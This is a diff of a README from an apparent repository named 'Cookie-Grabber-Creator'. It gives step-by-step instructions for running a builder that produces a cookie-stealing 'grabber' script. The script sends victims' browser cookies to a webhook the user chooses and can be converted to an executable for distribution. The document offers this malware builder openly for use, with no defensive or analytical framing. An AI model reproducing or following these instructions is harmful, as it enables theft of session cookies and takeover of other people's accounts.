H4cking-Esentials/Cookie-Grabber-Creator/README.md

 5. **If setup.exe takes longer than 30 seconds, go to GrabberSetup --> help --> BackupSetup (LAST RESORT) and run that**
 6. Run steps 2-4 again.
 7. That is the simplified version and it should load quicker but you won't get as many features.

+# Instructions (V2)
+*View pictures at the bottom for help*

+How to use
+1. Run main.exe
+2. Wait about 10 seconds while it loads all of the requirements in.
+3. Put in the name of your grabber.
+4. Put in the webhook from the channel you want to receive cookies from.
+5. When it is complete check the same directory as the setup for a grabber python script that you can convert to exe.

 # Features V1